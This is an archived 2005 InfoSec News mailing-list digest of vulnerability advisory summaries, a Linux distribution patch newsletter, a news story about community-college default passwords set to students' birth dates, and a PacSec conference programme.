Critical: Moderately critical
Where: From remote
Impact: Exposure of sensitive information
Released: 2005-09-19
Dennis Rand has reported a vulnerability in TAC Vista, which can be exploited by malicious people to disclose sensitive information.
Full Advisory: http://secunia.com/advisories/16854/

--
[SA16838] Compuware DriverStudio Two Vulnerabilities
Critical: Moderately critical
Where: From local network
Impact: Security Bypass, System access
Released: 2005-09-16
cocoruder has reported two vulnerabilities in DriverStudio, which can be exploited by malicious people to bypass certain security restrictions, and potentially compromise a vulnerable system.
Full Advisory: http://secunia.com/advisories/16838/

--
[SA16870] Digger Solutions Intranet Open Source "project_id" SQL Injection
Critical: Less critical
Where: From remote
Impact: Manipulation of data
Released: 2005-09-21
Kutbuddin Trunkwala has reported a vulnerability in Digger Solutions Intranet Open Source, which can be exploited by malicious users to conduct SQL injection attacks.
Full Advisory: http://secunia.com/advisories/16870/

--
[SA16865] Multi-Computer Control System (MCCS) Denial of Service Vulnerability
Critical: Less critical
Where: From local network
Impact: DoS
Released: 2005-09-19
basher13 has discovered a vulnerability in MCCS, which can be exploited by malicious people to cause a DoS (Denial of Service).
Full Advisory: http://secunia.com/advisories/16865/

UNIX/Linux:
--
[SA16869] Firefox Command Line URL Shell Command Injection
Critical: Extremely critical
Where: From remote
Impact: System access
Released: 2005-09-20
Peter Zelezny has discovered a vulnerability in Firefox, which can be exploited by malicious people to compromise a user's system.
Full Advisory: http://secunia.com/advisories/16869/

--
[SA16846] Mozilla Command Line URL Shell Command Injection
Critical: Extremely critical
Where: From remote
Impact: System access
Released: 2005-09-21
A vulnerability has been discovered in Mozilla Suite, which can be exploited by malicious people to compromise a user's system.
Full Advisory: http://secunia.com/advisories/16846/

--
[SA16895] Alkalay contribute "template" Shell Command Injection Vulnerability
Critical: Highly critical
Where: From remote
Impact: System access
Released: 2005-09-21
sullo has discovered a vulnerability in Alkalay contribute, which can be exploited by malicious people to compromise a vulnerable system.
Full Advisory: http://secunia.com/advisories/16895/

--
[SA16894] HP OpenVMS Secure Web Browser Multiple Vulnerabilities
Critical: Highly critical
Where: From remote
Impact: Security Bypass, Cross Site Scripting, Spoofing, System access
Released: 2005-09-21
HP has acknowledged some vulnerabilities in OpenVMS running Secure Web Browser, which can be exploited by malicious people to bypass certain security restrictions, conduct cross-site scripting attacks, spoof the contents of web sites, spoof dialog boxes, or compromise a user's system.
Full Advisory: http://secunia.com/advisories/16894/

--
[SA16887] Alkalay man-cgi "topic" Shell Command Injection Vulnerability
Critical: Highly critical
Where: From remote
Impact: System access
Released: 2005-09-21
sullo has discovered a vulnerability in Alkalay man-cgi, which can be exploited by malicious people to compromise a vulnerable system.
Full Advisory: http://secunia.com/advisories/16887/

--
[SA16886] Alkalay notify "from" Shell Command Injection Vulnerability
Critical: Highly critical
Where: From remote
Impact: System access
Released: 2005-09-21
sullo has discovered a vulnerability in Alkalay notify, which can be exploited by malicious people to compromise a vulnerable system.
Full Advisory: http://secunia.com/advisories/16886/

--
[SA16884] Mandriva update for clamav
Critical: Highly critical
Where: From remote
Impact: DoS, System access
Released: 2005-09-21
Mandriva has issued an update for clamav. This fixes two vulnerabilities, which can be exploited by malicious people to cause a DoS (Denial of Service), or potentially to compromise a vulnerable system.
Full Advisory: http://secunia.com/advisories/16884/

--
[SA16880] Alkalay nslookup Shell Command Injection Vulnerabilities
Critical: Highly critical
Where: From remote
Impact: System access
Released: 2005-09-21
sullo has discovered some vulnerabilities in Alkalay nslookup, which can be exploited by malicious people to compromise a vulnerable system.
Full Advisory: http://secunia.com/advisories/16880/

--
[SA16879] HP Tru64 UNIX libXpm Multiple Vulnerabilities
Critical: Highly critical
Where: From remote
Impact: DoS, System access
Released: 2005-09-21
HP has acknowledged some vulnerabilities in HP Tru64 UNIX, which can be exploited by malicious people to cause a DoS (Denial of Service) or compromise a vulnerable system.
Full Advisory: http://secunia.com/advisories/16879/

--
[SA16862] Gentoo update for clamav
Critical: Highly critical
Where: From remote
Impact: DoS, System access
Released: 2005-09-19
Gentoo has issued an update for clamav. This fixes two vulnerabilities, which can be exploited by malicious people to cause a DoS (Denial of Service), or potentially to compromise a vulnerable system.
Full Advisory: http://secunia.com/advisories/16862/

--
[SA16848] ClamAV UPX and FSG Handling Vulnerabilities
Critical: Highly critical
Where: From remote
Impact: DoS, System access
Released: 2005-09-19
Two vulnerabilities have been reported in ClamAV, which can be exploited by malicious people to cause a DoS (Denial of Service), or potentially to compromise a vulnerable system.
Full Advisory: http://secunia.com/advisories/16848/

--
[SA16844] Gentoo update for mozilla/mozilla-firefox
Critical: Highly critical
Where: From remote
Impact: DoS, System access
Released: 2005-09-19
Gentoo has issued an update for mozilla/mozilla-firefox. This fixes a vulnerability, which can be exploited by malicious people to cause a DoS (Denial of Service) or to compromise a user's system.
Full Advisory: http://secunia.com/advisories/16844/

--
[SA16834] SUSE update for evolution
Critical: Highly critical
Where: From remote
Impact: System access
Released: 2005-09-16
SUSE has issued an update for evolution. This fixes some vulnerabilities, which can be exploited by malicious people to compromise a vulnerable system.
Full Advisory: http://secunia.com/advisories/16834/

--
[SA16892] Gentoo update for zebedee
Critical: Moderately critical
Where: From remote
Impact: DoS
Released: 2005-09-21
Gentoo has issued an update for zebedee. This fixes a vulnerability, which can be exploited by malicious people to cause a DoS (Denial of Service).
Full Advisory: http://secunia.com/advisories/16892/

--
[SA16872] Unixware update for Libtiff
Critical: Moderately critical
Where: From remote
Impact: System access
Released: 2005-09-20
SCO has issued an update for Libtiff. This fixes a vulnerability, which potentially can be exploited by malicious people to compromise a vulnerable system.
Full Advisory: http://secunia.com/advisories/16872/ -- [SA16864] Gentoo update for apache/mod_ssl Critical: Moderately critical Where: From remote Impact: Security Bypass, Privilege escalation Released: 2005-09-19 Gentoo has issued an update for apache/mod_ssl. This fixes a security issue and a vulnerability, which potentially can be exploited by malicious people to bypass certain security restrictions, or by malicious, local users to gain escalated privileges via a specially crafted ".htaccess" file. Full Advisory: http://secunia.com/advisories/16864/ -- [SA16858] Webmin / Usermin PAM Authentication Bypass Vulnerability Critical: Moderately critical Where: From remote Impact: Security Bypass Released: 2005-09-20 Keigo Yamazaki has reported a vulnerability in Webmin and Usermin, which can be exploited by malicious people to bypass certain security restrictions. Full Advisory: http://secunia.com/advisories/16858/ -- [SA16856] Gentoo update for mailutils Critical: Moderately critical Where: From remote Impact: System access Released: 2005-09-19 Gentoo has issued an update for mailutils. This fixes a vulnerability, which can be exploited by malicious users to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/16856/ -- [SA16849] SUSE update for squid Critical: Moderately critical Where: From remote Impact: DoS Released: 2005-09-16 SUSE has issued an update for squid. This fixes two vulnerabilities, which potentially can be exploited by malicious people to cause a DoS (Denial of Service). Full Advisory: http://secunia.com/advisories/16849/ -- [SA16876] Tofu Game Engine Arbitrary Python Code Execution Vulnerability Critical: Moderately critical Where: From local network Impact: System access Released: 2005-09-20 Arc Riley has reported a vulnerability in Tofu, which can be exploited by malicious people to compromise a user's system. 
Full Advisory: http://secunia.com/advisories/16876/ -- [SA16863] Gentoo workaround for py2play Critical: Moderately critical Where: From local network Impact: System access Released: 2005-09-19 Gentoo has published a workaround for py2play. This fixes a vulnerability, which can be exploited by malicious people to compromise a user's system. Full Advisory: http://secunia.com/advisories/16863/ -- [SA16855] Py2Play Game Engine Arbitrary Python Code Execution Vulnerability Critical: Moderately critical Where: From local network Impact: System access Released: 2005-09-19 Arc Riley has reported a vulnerability in Py2Play, which can be exploited by malicious people to compromise a user's system. Full Advisory: http://secunia.com/advisories/16855/ -- [SA16888] PerlDiver "module" Cross-Site Scripting Vulnerability Critical: Less critical Where: From remote Impact: Cross Site Scripting Released: 2005-09-21 Donnie Werner has reported a vulnerability in PerlDiver, which can be exploited by malicious people to conduct cross-site scripting attacks. Full Advisory: http://secunia.com/advisories/16888/ -- [SA16893] HP Tru64 UNIX FTP Daemon Denial of Service Vulnerability Critical: Less critical Where: From local network Impact: DoS Released: 2005-09-21 A vulnerability has been reported in HP Tru64 UNIX, which can be exploited by malicious users to cause a DoS (Denial of Service). Full Advisory: http://secunia.com/advisories/16893/ -- [SA16885] Mandriva update for cups Critical: Less critical Where: From local network Impact: Security Bypass Released: 2005-09-21 Mandriva has issued an update for cups. This fixes a vulnerability, which can be exploited by malicious users to bypass certain security restrictions. 
Full Advisory: http://secunia.com/advisories/16885/ -- [SA16883] MasqMail Two Privilege Escalation Vulnerabilities Critical: Less critical Where: Local system Impact: Privilege escalation Released: 2005-09-21 Jens Steube has reported two vulnerabilities in MasqMail, which potentially can be exploited by malicious, local users to gain escalated privileges. Full Advisory: http://secunia.com/advisories/16883/ -- [SA16874] Sun Solaris "tl" Driver Denial of Service Vulnerability Critical: Less critical Where: Local system Impact: DoS Released: 2005-09-20 A vulnerability has been reported in Solaris, which can be exploited by malicious, local users to cause a DoS (Denial of Service). Full Advisory: http://secunia.com/advisories/16874/ -- [SA16866] Bacula Multiple Insecure Temporary File Creation Vulnerability Critical: Less critical Where: Local system Impact: Exposure of sensitive information, Privilege escalation Released: 2005-09-20 Eric Romang has reported some vulnerabilities in bacula, which can be exploited by malicious, local users to perform certain actions on a vulnerable system with escalated privileges, or to disclose certain sensitive information. Full Advisory: http://secunia.com/advisories/16866/ -- [SA16861] Trustix update for multiple packages Critical: Less critical Where: Local system Impact: Exposure of sensitive information, Privilege escalation, DoS Released: 2005-09-19 Trustix has issued updates for multiple packages. These fix some vulnerabilities, which potentially can be exploited by malicious, local users to disclose certain sensitive information, cause a DoS (Denial of Service), and gain escalated privileges. Full Advisory: http://secunia.com/advisories/16861/ -- [SA16860] Fedora update for xorg-x11 Critical: Less critical Where: Local system Impact: Privilege escalation Released: 2005-09-19 Fedora has issued an update for xorg-x11. 
This fixes a vulnerability, which potentially can be exploited by malicious, local users to gain escalated privileges. Full Advisory: http://secunia.com/advisories/16860/ -- [SA16850] Debian update for kdebase Critical: Less critical Where: Local system Impact: Privilege escalation Released: 2005-09-19 Debian has issued an update for kdebase. This fixes a vulnerability, which potentially can be exploited by malicious, local users to gain escalated privileges. Full Advisory: http://secunia.com/advisories/16850/ -- [SA16845] Sun Solaris X11 Pixmap Creation Integer Overflow Vulnerability Critical: Less critical Where: Local system Impact: Privilege escalation Released: 2005-09-16 Sun Microsystems has acknowledged a vulnerability in Solaris, which potentially can be exploited by malicious, local users to gain escalated privileges. Full Advisory: http://secunia.com/advisories/16845/ -- [SA16842] Debian update for lm-sensors Critical: Less critical Where: Local system Impact: Privilege escalation Released: 2005-09-16 Debian has issued an update for lm-sensors. This fixes a vulnerability, which can be exploited by malicious, local users to perform certain actions on a vulnerable system with escalated privileges. Full Advisory: http://secunia.com/advisories/16842/ -- [SA16835] SimpleCDR-X Insecure Temporary Image File Creation Critical: Less critical Where: Local system Impact: Exposure of sensitive information Released: 2005-09-16 Jonas Thambert has reported a security issue in SimpleCDR-X, which can be exploited by malicious, local users to gain access to sensitive information. Full Advisory: http://secunia.com/advisories/16835/ -- [SA16875] Safari "data:" URI Handler Denial of Service Weakness Critical: Not critical Where: From remote Impact: DoS Released: 2005-09-20 Jonathan Rockway has discovered a weakness in Safari, which can be exploited by malicious people to cause a DoS (Denial of Service). 
Full Advisory: http://secunia.com/advisories/16875/

--
[SA16891] Gentoo update for util-linux
Critical: Not critical
Where: Local system
Impact: Privilege escalation
Released: 2005-09-21

Gentoo has issued an update for util-linux. This fixes a security issue, which potentially can be exploited by malicious, local users to gain escalated privileges.

Full Advisory: http://secunia.com/advisories/16891/

--
[SA16882] Mandriva update for util-linux
Critical: Not critical
Where: Local system
Impact: Privilege escalation
Released: 2005-09-21

Mandriva has issued an update for util-linux. This fixes a security issue, which potentially can be exploited by malicious, local users to gain escalated privileges.

Full Advisory: http://secunia.com/advisories/16882/

--
[SA16857] Ubuntu update for util-linux
Critical: Not critical
Where: Local system
Impact: Privilege escalation
Released: 2005-09-19

Ubuntu has issued an update for util-linux. This fixes a vulnerability, which potentially can be exploited by malicious, local users to gain escalated privileges.

Full Advisory: http://secunia.com/advisories/16857/

Other:
--
[SA16840] vxTftpSrv Long Filename Buffer Overflow
Critical: Moderately critical
Where: From local network
Impact: DoS, System access
Released: 2005-09-16

Seth Fogie has reported a vulnerability in vxTftpSrv, which can be exploited by malicious people to cause a DoS (Denial of Service), or potentially to compromise a vulnerable system.

Full Advisory: http://secunia.com/advisories/16840/

--
[SA16837] vxFtpSrv "USER" Command Buffer Overflow Vulnerability
Critical: Moderately critical
Where: From local network
Impact: DoS, System access
Released: 2005-09-16

Seth Fogie has reported a vulnerability in vxFtpSrv, which can be exploited by malicious people to cause a DoS (Denial of Service), or potentially to compromise a vulnerable system.
Full Advisory: http://secunia.com/advisories/16837/

--
[SA16836] Avocent CCM Port Access Control Bypass Vulnerability
Critical: Less critical
Where: From remote
Impact: Security Bypass
Released: 2005-09-16

Dirk Wetter has reported a vulnerability in Avocent CCM, which can be exploited by malicious users to bypass certain security restrictions.

Full Advisory: http://secunia.com/advisories/16836/

--
[SA16839] vxWeb Denial of Service Vulnerability
Critical: Less critical
Where: From local network
Impact: DoS
Released: 2005-09-16

Seth Fogie has reported a vulnerability in vxWeb, which can be exploited by malicious people to cause a DoS (Denial of Service).

Full Advisory: http://secunia.com/advisories/16839/

Cross Platform:
--
[SA16841] Digital Scribe "username" SQL Injection
Critical: Highly critical
Where: From remote
Impact: Security Bypass, Manipulation of data, System access
Released: 2005-09-16

rgod has discovered a vulnerability in Digital Scribe, which can be exploited by malicious people to conduct SQL injection attacks and compromise a vulnerable system.

Full Advisory: http://secunia.com/advisories/16841/

--
[SA16896] Zengaia Unspecified SQL Injection Vulnerability
Critical: Moderately critical
Where: From remote
Impact: Manipulation of data
Released: 2005-09-21

A vulnerability has been reported in Zengaia, which can be exploited by malicious people to conduct SQL injection attacks.

Full Advisory: http://secunia.com/advisories/16896/

--
[SA16881] Simplog SQL Injection Vulnerabilities
Critical: Moderately critical
Where: From remote
Impact: Manipulation of data
Released: 2005-09-21

r0ut3r has discovered some vulnerabilities in Simplog, which can be exploited by malicious people to conduct SQL injection attacks.
Full Advisory: http://secunia.com/advisories/16881/

--
[SA16878] Land Down Under "Referer" SQL Injection Vulnerability
Critical: Moderately critical
Where: From remote
Impact: Manipulation of data
Released: 2005-09-21

A vulnerability has been discovered in Land Down Under, which can be exploited by malicious people to conduct SQL injection attacks.

Full Advisory: http://secunia.com/advisories/16878/

--
[SA16867] PHP Advanced Transfer Manager Multiple Vulnerabilities
Critical: Moderately critical
Where: From remote
Impact: Cross Site Scripting, Exposure of system information, Exposure of sensitive information
Released: 2005-09-20

rgod has discovered some vulnerabilities and a security issue in PHP Advanced Transfer Manager, which can be exploited by malicious people to disclose system and sensitive information, and to conduct cross-site scripting attacks.

Full Advisory: http://secunia.com/advisories/16867/

--
[SA16859] Helpdesk software Hesk Authentication Bypass Vulnerability
Critical: Moderately critical
Where: From remote
Impact: Security Bypass, Exposure of system information
Released: 2005-09-20

OS2A has reported a vulnerability in Helpdesk software Hesk, which can be exploited by malicious people to bypass certain security restrictions.

Full Advisory: http://secunia.com/advisories/16859/

--
[SA16853] NooToplist "o" SQL Injection Vulnerability
Critical: Moderately critical
Where: From remote
Impact: Manipulation of data
Released: 2005-09-19

David Sopas Ferreira has reported a vulnerability in NooToplist, which can be exploited by malicious people to conduct SQL injection attacks.

Full Advisory: http://secunia.com/advisories/16853/

--
[SA16843] PHP-Nuke Unspecified wysiwyg Editor Vulnerabilities
Critical: Moderately critical
Where: From remote
Impact: Unknown
Released: 2005-09-16

Some potential vulnerabilities have been reported in PHP-Nuke with unknown impacts.
Full Advisory: http://secunia.com/advisories/16843/

--
[SA16873] vBulletin Multiple Vulnerabilities
Critical: Less critical
Where: From remote
Impact: Cross Site Scripting, Manipulation of data, System access
Released: 2005-09-20

Thomas Waldegger has reported some vulnerabilities in vBulletin, which can be exploited by malicious users to conduct SQL injection attacks and potentially compromise a vulnerable system, and by malicious people to conduct cross-site scripting attacks.

Full Advisory: http://secunia.com/advisories/16873/

--
[SA16868] phpBB Remote Avatar Information Disclosure Weakness
Critical: Not critical
Where: From remote
Impact: Exposure of system information
Released: 2005-09-21

A weakness has been discovered in phpBB, which can be exploited by malicious people to disclose certain system information.

Full Advisory: http://secunia.com/advisories/16868/

========================================================================

Secunia recommends that you verify all advisories you receive, by clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only use those supplied by the vendor.

Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/

Subscribe:
http://secunia.com/secunia_weekly_summary/

Contact details:
Web : http://secunia.com/
E-mail : support@secunia.com
Tel : +45 70 20 51 44
Fax : +45 70 20 51 45

From isn at c4i.org Mon Sep 26 00:04:11 2005
From: isn at c4i.org (InfoSec News)
Date: Mon Sep 26 00:11:01 2005
Subject: [ISN] Linux Advisory Watch - September 23rd 2005
Message-ID:

+---------------------------------------------------------------------+
|  LinuxSecurity.com                         Weekly Newsletter        |
|  September 23rd, 2005                      Volume 6, Number 39a     |
+---------------------------------------------------------------------+

Editors: Dave Wreski (dave@linuxsecurity.com), Benjamin D. Thomas (ben@linuxsecurity.com)

Linux Advisory Watch is a comprehensive newsletter that outlines the security vulnerabilities that have been announced throughout the week. It includes pointers to updated packages and descriptions of each vulnerability.

This week, advisories were released for turqstat, centericq, lm-sensors, kdebase, python, XFree86, Mailutils, Shorewall, mozilla, mod_ssl, clam, mod_ssl, Zebedee, umount, squid, and mod_ssl. The distributors include Debian, Fedora, Gentoo, and Red Hat.

---

## Master of Science in Information Security ##

Earn your Master of Science in Information Security online from Norwich University. Designated a "Center of Excellence", the program offers a solid education in the management of information assurance, and the unique case study method melds theory into practice. Using today's e-Learning technology, you can earn this esteemed degree, without disrupting your career or home life.

LEARN MORE: http://www.msia.norwich.edu/linux_en

---

Security Basics

In the ever-changing world of global data communications, inexpensive Internet connections, and fast-paced software development, security is becoming more and more of an issue. Security is now a basic requirement because global computing is inherently insecure. As your data goes from point A to point B on the Internet, for example, it may pass through several other points along the way, giving other users the opportunity to intercept, and even alter, your data. Even other users on your system may maliciously transform your data into something you did not intend. Unauthorized access to your system may be obtained by intruders, also known as ``crackers'', who then use advanced knowledge to impersonate you, steal information from you, or even deny you access to your own resources.
If you're still wondering what the difference is between a ``Hacker'' and a ``Cracker'', see Eric Raymond's document, ``How to Become A Hacker'', available at: http://www.catb.org/~esr/faqs/hacker-howto.html

How Vulnerable Are We?

While it is difficult to determine just how vulnerable a particular system is, there are several indications we can use:

* The Computer Emergency Response Team consistently reports an increase in computer vulnerabilities and exploits.

* TCP and UDP, the protocols that comprise the Internet, were not written with security as their first priority when they were created more than 30 years ago.

* A version of software on one host has the same vulnerabilities as the same version of software on another host. Using this information, an intruder can exploit multiple systems using the same attack method.

* Many administrators don't even take the simple security measures necessary to protect their site, or don't understand the ramifications of implementing some services. Many administrators are not given the additional time necessary to integrate the necessary security measures.

Excerpt from the LinuxSecurity Administrator's Guide:
http://www.linuxsecurity.com/docs/SecurityAdminGuide/SecurityAdminGuide.html
Written by: Dave Wreski (dave@guardiandigital.com)

----------------------

Linux File & Directory Permissions Mistakes

One common mistake Linux administrators make is having file and directory permissions that are far too liberal and allow access beyond that which is needed for proper system operations. A full explanation of unix file permissions is beyond the scope of this article, so I'll assume you are familiar with the usage of such tools as chmod, chown, and chgrp. If you'd like a refresher, one is available right here on linuxsecurity.com.
http://www.linuxsecurity.com/content/view/119415/49/

---

Buffer Overflow Basics

A buffer overflow occurs when a program or process tries to store more data in a temporary data storage area than it was intended to hold. Since buffers are created to contain a finite amount of data, the extra information can overflow into adjacent buffers, corrupting or overwriting the valid data held in them.

http://www.linuxsecurity.com/content/view/119087/49/

---

Review: The Book of Postfix: State-of-the-Art Message Transport

I was very impressed with "The Book of Postfix" by authors Ralf Hildebrandt and Patrick Koetter and feel that it is an incredible Postfix reference. It gives a great overall view of the operation and management of Postfix in an extremely systematic and practical format. It flows in a logical manner, is easy to follow and the authors did a great job of explaining topics with attention paid to real world applications and how to avoid many of the associated pitfalls. I am happy to have this reference in my collection.

http://www.linuxsecurity.com/content/view/119027/49/

--------

--> Take advantage of the LinuxSecurity.com Quick Reference Card!
--> http://www.linuxsecurity.com/docs/QuickRefCard.pdf

+---------------------------------+
|  Distribution: Debian           | ----------------------------//
+---------------------------------+

* Debian: New turqstat packages fix buffer overflow
  15th, September, 2005
  Updated package.
  http://www.linuxsecurity.com/content/view/120389

* Debian: New centericq packages fix several vulnerabilities
  15th, September, 2005
  Updated package.
  http://www.linuxsecurity.com/content/view/120392

* Debian: New lm-sensors packages fix insecure temporary file
  15th, September, 2005
  Updated package.
  http://www.linuxsecurity.com/content/view/120395

* Debian: New kdebase packages fix local root vulnerability
  16th, September, 2005
  Updated package.
  http://www.linuxsecurity.com/content/view/120399

* Debian: New python2.2 packages fix arbitrary code execution
  22nd, September, 2005
  Updated package.
  http://www.linuxsecurity.com/content/view/120425

* Debian: New XFree86 packages fix arbitrary code execution
  22nd, September, 2005
  Updated package.
  http://www.linuxsecurity.com/content/view/120426

+---------------------------------+
|  Distribution: Fedora           | ----------------------------//
+---------------------------------+

* Fedora Core 4 Update: dia-0.94-12.fc4
  16th, September, 2005
  Updated package.
  http://www.linuxsecurity.com/content/view/120400

* Fedora Core 4 Update: qt-3.3.4-15.4
  16th, September, 2005
  Updated package.
  http://www.linuxsecurity.com/content/view/120401

+---------------------------------+
|  Distribution: Gentoo           | ----------------------------//
+---------------------------------+

* Gentoo: Py2Play Remote execution of arbitrary Python
  17th, September, 2005
  A design error in Py2Play allows attackers to execute arbitrary code.
  http://www.linuxsecurity.com/content/view/120402

* Gentoo: Mailutils Format string vulnerability in imap4d
  17th, September, 2005
  The imap4d server contains a vulnerability allowing an authenticated user to execute arbitrary code with the privileges of the imap4d process.
  http://www.linuxsecurity.com/content/view/120403

* Gentoo: Shorewall Security policy bypass
  17th, September, 2005
  A vulnerability in Shorewall allows clients authenticated by MAC address filtering to bypass all other security rules.
  http://www.linuxsecurity.com/content/view/120404

* Gentoo: Mozilla Suite, Mozilla Firefox Buffer overflow
  18th, September, 2005
  Mozilla Suite and Firefox are vulnerable to a buffer overflow that might be exploited to execute arbitrary code.
  http://www.linuxsecurity.com/content/view/120405

* Gentoo: Apache, mod_ssl Multiple vulnerabilities
  19th, September, 2005
  mod_ssl and Apache are vulnerable to a restriction bypass and a potential local privilege escalation.
  http://www.linuxsecurity.com/content/view/120408

* Gentoo: Clam AntiVirus Multiple vulnerabilities
  19th, September, 2005
  Clam AntiVirus is subject to vulnerabilities ranging from Denial of Service to execution of arbitrary code when handling compressed executables.
  http://www.linuxsecurity.com/content/view/120409

* Gentoo: Apache, mod_ssl Multiple vulnerabilities
  19th, September, 2005
  mod_ssl and Apache are vulnerable to a restriction bypass and a potential local privilege escalation.
  http://www.linuxsecurity.com/content/view/120411

* Gentoo: Shorewall Security policy bypass
  19th, September, 2005
  A vulnerability in Shorewall allows clients authenticated by MAC address filtering to bypass all other security rules.
  http://www.linuxsecurity.com/content/view/120412

* Gentoo: Zebedee Denial of Service vulnerability
  20th, September, 2005
  A bug in Zebedee allows a remote attacker to perform a Denial of Service attack.
  http://www.linuxsecurity.com/content/view/120417

* Gentoo: util-linux umount command validation error
  20th, September, 2005
  A command validation error in umount can lead to an escalation of privileges.
  http://www.linuxsecurity.com/content/view/120418

+---------------------------------+
|  Distribution: Red Hat          | ----------------------------//
+---------------------------------+

* RedHat: Important: XFree86 security update
  15th, September, 2005
  This update has been rated as having important security impact by the Red Hat Security Response Team.
  http://www.linuxsecurity.com/content/view/120390

* RedHat: Important: squid security update
  15th, September, 2005
  An updated Squid package that fixes security issues is now available. This update has been rated as having important security impact by the Red Hat Security Response Team.
  http://www.linuxsecurity.com/content/view/120391

* RedHat: Important: mod_ssl security update
  15th, September, 2005
  An updated mod_ssl package for Apache that corrects a security issue is now available.
  This update has been rated as having important security impact by the Red Hat Security Response Team.
  http://www.linuxsecurity.com/content/view/120396

------------------------------------------------------------------------
Distributed by: Guardian Digital, Inc.                LinuxSecurity.com

To unsubscribe email vuln-newsletter-request@linuxsecurity.com with "unsubscribe" in the subject of the message.
------------------------------------------------------------------------

From isn at c4i.org Mon Sep 26 00:04:31 2005
From: isn at c4i.org (InfoSec News)
Date: Mon Sep 26 00:11:19 2005
Subject: [ISN] Virginia Western student prompts quick fix of computer security
Message-ID:

http://www.roanoke.com/news/roanoke/wb/wb/xp-33313

By Cody Lowe
The Roanoke Times
September 23, 2005

Every student, faculty member and staffer in the Virginia Community College System is being alerted to a significant threat to its online access system.

A Virginia Western Community College student contacted The Roanoke Times this week about the potential for outsiders to gain easy access to students' e-mail addresses and default passwords - their birth dates - through a national online directory called Facebook.

After the newspaper contacted the statewide system's administrators in Richmond, they began pushing up the implementation of new login procedures for all of the state's 23 community colleges.

"The student who reported this to you did us quite a service," said David Harrison, head of Technical Support Services at Virginia Western.

It wasn't that the system's administrators weren't aware of the potential problem, said Neil Matkin, Richmond-based vice chancellor for information technology for the 350,000-student statewide system. But the knowledge that word was spreading about the chink in the system's armor prompted immediate action, rather than waiting for spring, he said.
The system's technology council, with representatives from each school, is scheduled to vote in a conference call today on implementing changes to help reduce the risks. Among the options would be to compel students to change their passwords the first time they enter the system.

In the meantime, Harrison said, everyone with a Virginia community college e-mail address is being alerted to the potential problem.

"We're highly advising anybody using their default password to change it immediately," Harrison said. "We're also putting messages out on all the home pages of the services we offer."

He's also recommending students remove their addresses from the Facebook Web site.

Facebook - www.thefacebook.com - provides a way for college students to meet each other by posting a picture and personal profile online, accessible by others who have legitimate college e-mail addresses. It now has 3 million users nationwide at 800 colleges.

The Roanoke student who noticed the problem, Joe Swindell, might be called an anti-hacker. When he found the vulnerability, he worried that it was distressingly easy for a hacker - even the most unsophisticated one - to gain access to students' personal accounts. He decided to contact the newspaper.

Swindell worked as a security technician assistant as a student at Lees-McRae College in North Carolina last year, he said, so when he noticed the flaw in the Virginia Western system, "I ran off with that."

Swindell confirmed that most of the users included their birth dates in their profiles. That's when the red flag went up.

The Virginia Community College System automatically assigns students their birth dates as their passwords to access all their college accounts online. While students are "strongly encouraged" to change the passwords once they enter the system, Harrison said, many do not.
So anyone with access to Facebook could look up other students at Virginia Western, get their e-mail addresses and birth dates, then access their personal accounts. A hacker could wreak havoc by changing the password, submitting bogus e-mail, or - at the right time of the year - even enroll or drop the other student from classes.

Swindell's concern was "very well founded," conceded Matkin, even though it is difficult to determine exactly how many of the system's students also use Facebook or have their birth dates listed there.

Matkin said the computer code to fix the problem has been ready for months. The colleges delayed implementing it this fall, however, because they were upgrading a group of other major systems for students and hoped to minimize confusion and pressure on each college's help desk.

"We were trying to make [the entire process] student friendly, making the password something that was easily remembered," but wouldn't be commonly known, Matkin said. "You don't wear it on your forehead."

However, "Facebook has caused unprecedented problems," he said. "We didn't expect that."

Harrison said he believes students are sometimes too lax about what they post.

"It's a case of providing a little too much personal information" in a place where it can be seen by millions of people, Harrison said. "With the Internet, people don't have to fish for information; a lot of times you just give it to them."

"Somehow we have to get out to students good security practices. A lot of the information they put on the Internet, they don't realize can be used for bad things. This is one of those things."

"There is a chance absolutely nothing will happen, but it's one that we're concerned about," Harrison said. "It's very important to us that we maintain data integrity."

Swindell said he just wanted to help.

"I'm only trying to point out the problem. Something needed to be changed. ... I think this is great."
From isn at c4i.org Mon Sep 26 00:06:06 2005
From: isn at c4i.org (InfoSec News)
Date: Mon Sep 26 00:11:56 2005
Subject: [ISN] PacSec05
Message-ID:

Forwarded from: Dragos Ruiu

English url: http://pacsec.jp/index.html?LANG=ENGLISH
Japanese url: http://pacsec.jp/index.html?LANG=JAPANESE

Miyamoto Musashi, famous swordsman and author of "Go Rin No Sho" (the Book of Five Rings), wrote "Study the Way of all professions." In the way of computer networks, one must understand attacks before one can forestall them.

I would like to announce the selection of the PacSec applied technical security seminar presentations. The event will be held on November 15/16 in Tokyo, Japan, at the Aoyama Diamond Hall, accessible at exit B5 of the Omotesando station, on Ginza or Hanzomon lines.

The selected papers are:

Andrea Barisani - Gentoo
Building a modern LDAP based security framework.

Cedric "Sid" Blancher - EADS
WiFi traffic injection based attacks

Javier Burroni - CORE SDI
Using Neural Networks for remote OS identification

Maximillian Dornseif - Laboratory for Dependable Distributed Systems
Watching hackers hack - attack visualization

van Hauser - thc
Attacking the IPv6 protocol suite

Adam Jacobs - Oracle
Commercial Software and How Can We Fix It?

Chris Jordan - Endeavor Systems
Writing Better Intrusion Prevention Signatures

Hiroshi Shinotsuka - Symantec
Advances in Trojan Threats

Feng "Sowhat" Xue - 3rd Research Institute, Ministry of Public Security, Chinese National Anti-Intrusion and Anti-virus Research Center
Talking About 0day

Ilja van Sprundel - Suresec
Unix Kernel Auditing

Window Snyder - formerly Microsoft
A new perspective on internal security.

Yuji Ukai - eeye
Real-Time OS Based Embedded Systems Using the JTAG Emulator

Marc Uemura - PWC
Fault Redundant IPV6 Wireless Firewalls

Christian Wieser - Oulu University Secure Programming Group
VoIP: SIP robustness and RTP security

All presentations are in both Japanese and English.
Registration is on line at http://pacsec.jp

**********************************************************

Security Masters Dojo, Tokyo
----------------------------------

The Tokyo Security Masters Dojo will be held on November 14, also at the Aoyama Diamond Hall. The following one day advanced and intermediate applied information security courses will be offered:

Sinan 'noir' Eren & Nicolas Waisman - Immunity
Win32 Reliable Heap Exploitation

Gerardo Richarte - Core Security Technologies
Assembly for Exploit Writing

Marty Roesch - Sourcefire
Advanced IDS Deployment and Optimization

Maximillian Dornseif & Thorsten Holz - Aachen University
Advanced Honeypot Tactics

Philippe Biondi - EADS
Mastering the Network with SCAPY

